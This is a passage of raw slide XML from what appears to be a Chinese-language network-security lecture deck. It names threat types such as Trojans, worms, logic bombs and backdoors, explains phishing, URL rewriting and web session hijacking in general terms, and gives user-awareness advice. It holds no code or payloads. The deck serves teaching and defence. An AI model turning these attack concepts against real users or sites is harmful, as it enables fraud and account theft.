          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s622437" name="剪辑" r:id="rId7" imgW="1517650" imgH="2286635" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪辑" r:id="rId7" imgW="1517650" imgH="2286635"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 y="3024"/>
                          <a:ext cx="816"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Line 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3792" y="2784"/>
              <a:ext cx="192" cy="3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58" name="Object 14"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="912" y="1248"/>
            <a:ext cx="912" cy="544"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s622438" name="剪辑" r:id="rId9" imgW="2286635" imgH="2034540" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪辑" r:id="rId9" imgW="2286635" imgH="2034540" progId="">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1248"/>
                          <a:ext cx="912"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9" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1536" y="1776"/>
              <a:ext cx="144"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60" name="Object 16"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="1104" y="2880"/>
            <a:ext cx="638" cy="588"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s622439" name="剪辑" r:id="rId11" imgW="2440305" imgH="4413250" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪辑" r:id="rId11" imgW="2440305" imgH="4413250" progId="">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2880"/>
                          <a:ext cx="638" cy="588"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:extLst>
                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                              <a:solidFill>
                                <a:srgbClr val="FAEF65"/>
                              </a:solidFill>
                            </a14:hiddenFill>
                          </a:ext>
                        </a:extLst>
                      </p:spPr>
                    </p:pic>
                  </p:oleObj>
                </mc:Fallback>
              </mc:AlternateContent>
            </a:graphicData>
          </a:graphic>
        </p:graphicFrame>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6161" name="Line 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1440" y="2688"/>
              <a:ext cx="336"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2" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4440" y="3120"/>
              <a:ext cx="93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b="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0F0272"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>内、外部</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
                  <a:solidFill>
                    <a:srgbClr val="0F0272"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>泄密</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0F0272"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6163" name="Text Box 19"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4224" y="2650"/>
              <a:ext cx="12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拒绝服务攻击</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0F0272"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6164" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1104" y="3552"/>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逻辑炸弹</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0F0272"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6165" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="960" y="1056"/>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特洛伊木马</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0F0272"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6166" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2112" y="960"/>
              <a:ext cx="1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黑客攻击</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0F0272"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6167" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3888" y="2736"/>
              <a:ext cx="144" cy="3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8" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4224" y="1056"/>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计算机病毒</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0F0272"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="6169" name="Object 25"/>
            <p:cNvGraphicFramePr/>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="624" y="2016"/>
            <a:ext cx="496" cy="413"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s622440" name="剪辑" r:id="rId13" imgW="6148705" imgH="5129530" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪辑" r:id="rId13" imgW="6148705" imgH="5129530" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0" name="Picture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 y="2016"/>
                          <a:ext cx="496"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0" name="Line 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1152" y="2208"/>
              <a:ext cx="24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1" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="343" y="2448"/>
              <a:ext cx="114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信息丢失、篡改、销毁</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0F0272"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="6172" name="Object 28"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3168" y="1200"/>
            <a:ext cx="431" cy="432"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s622441" name="剪辑" r:id="rId15" imgW="2283460" imgH="2287270" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="剪辑" r:id="rId15" imgW="2283460" imgH="2287270" progId="">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 y="1200"/>
                          <a:ext cx="431"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3" name="Line 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3264" y="1584"/>
              <a:ext cx="144"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Text Box 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2976" y="960"/>
              <a:ext cx="1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后门、隐蔽通道</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0F0272"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="6175" name="Object 31"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="2203" y="3055"/>
            <a:ext cx="840" cy="525"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s622442" name="Clip" r:id="rId17" imgW="3212465" imgH="3935730" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId17" imgW="3212465" imgH="3935730" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="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03" y="3055"/>
                          <a:ext cx="840" cy="525"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:extLst>
                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                              <a:solidFill>
                                <a:srgbClr val="FAEF65"/>
                              </a:solidFill>
                            </a14:hiddenFill>
                          </a:ext>
                        </a:extLst>
                      </p:spPr>
                    </p:pic>
                  </p:oleObj>
                </mc:Fallback>
              </mc:AlternateContent>
            </a:graphicData>
          </a:graphic>
        </p:graphicFrame>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6176" name="Text Box 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2352" y="3648"/>
              <a:ext cx="8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solidFill>
                    <a:srgbClr val="0F0272"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>蠕虫</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0F0272"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6177" name="Line 33"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2688" y="2784"/>
              <a:ext cx="336"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027" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如假冒中华慈善总会名义骗印度洋海啸捐款，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>假冒银联的网站盗取用户密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385026" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>phishing</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D8E0EAB7-98F3-42A7-9826-C199C54D2B8B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="385028" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3505200"/>
            <a:ext cx="4733925" cy="2876550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>页面从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务器到浏览器的传输过程中，内容被修改</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>改写可以把用户带到不该去的地方</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>有一些更为隐蔽的做法：直接指向一些恶意的代码、把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>定向放到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>代码中</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>改写页面的做法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>入侵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务器，修改页面、设置中间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>代理、在传输路径上截获页面并改写、在客户端装载后门程序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253954" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>改写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3DFC9180-7B8E-47BE-B6DE-E038CD57C941}"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39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39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39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39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autoUpdateAnimBg="0" build="p"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide272.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54979" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>协议不支持会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>无状态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会话如何实现？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>记录会话</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>用表单中的隐藏元素记录会话</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会话劫持的要点在于，如何获得或者猜测出会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254978" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会话劫持</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B5EE5784-4609-4A37-BA98-F386D7AACB39}"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4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49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49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49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autoUpdateAnimBg="0" build="p"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide273.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normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用类似的域名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>注意观察</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址栏的变化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不要信任不可靠的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>phishing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>提高安全意识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
